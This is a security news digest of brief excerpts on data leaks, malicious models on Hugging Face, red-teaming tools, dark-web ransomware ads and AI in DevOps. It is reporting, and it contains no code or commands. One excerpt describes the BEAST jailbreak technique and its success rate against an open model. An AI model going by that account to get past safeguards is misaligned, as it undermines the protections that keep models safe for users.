Security News
While 99% of companies have data protection solutions in place, 78% of cybersecurity leaders admit they've still had sensitive data breached, leaked, or exposed. "Today, data is highly portable. While AI and cloud technologies are igniting new business ventures that allow employees to connect, create, and collaborate, they also make it easier to leak critical corporate data like source code and IP," said Joe Payne, CEO of Code42.
As many as 100 malicious artificial intelligence (AI)/machine learning (ML) models have been discovered in the Hugging Face platform. These include instances where loading a pickle file leads to...
Python Risk Identification Tool is Microsoft's open-source automation framework that enables security professionals and machine learning engineers to find risks in generative AI systems. It started as a collection of individual scripts used during the team's initial foray into red teaming generative AI systems in 2022.
Group-IB found these compromised credentials within the logs of information-stealing malware traded on illicit dark web marketplaces. Throughout the reporting period, Group-IB experts uncovered 27 new advertisements for ransomware-as-a-service programs on dark web forums, including well known groups such as Qilin, as well as other collectives that have yet to be seen in the wild.
Eficode research indicates that 96% of developers use AI tools, with most coders bypassing security policies to use them. With no standardized AI tool regulations, researchers advocate for stronger governance frameworks and AI security policies in organizations' DevOps strategies to encompass the challenges and opportunities AI presents.
Brave Software is the next company to jump into AI, announcing a new privacy-preserving AI assistant called "Leo" is rolling out on the Android version of its browser through the latest release, version 1.63. Brave says its AI assistant stands out for its ability to provide high-quality, relevant answers with fewer errors, thanks to leveraging several advanced large-language models like Mixtral 8x7B, Claude Instant, and Llama 2 13B, with Mixtral set as the default for its multilingual capabilities and superior performance.
As early as 2018, the powerful foundation models powering cutting-edge applications like chatbots have been called "Frontier AI." In previous decades, the internet itself was considered an electronic frontier. Turner grappled with some of the negative consequences and contradictions of the frontier ethic and how it shaped American democracy.
"[I]n just one minute per prompt, we get an attack success rate of 89 percent on jailbreaking Vicuna-7B- v1.5, while the best baseline method achieves 46 percent," the authors state in their paper. "BEAST can attack a model as long as the model's token probability scores from the final network layer can be accessed. OpenAI is planning on making this available. Therefore, we can technically attack publicly available models if their token probability scores are available."
At least 100 instances of malicious AI ML models were found on the Hugging Face platform, some of which can execute code on the victim's machine, giving attackers a persistent backdoor. JFrog's security team found that roughly a hundred models hosted on the platform feature malicious functionality, posing a significant risk of data breaches and espionage attacks.
In this Help Net Security interview, Itamar Friedman, CEO of Codium AI, discusses the integration of AI into DevOps practices and its impact on software development processes, particularly in automating code review, ensuring compliance, and improving efficiency. How is AI integrated into DevOps practices, and what are the most significant changes you've observed in software development processes?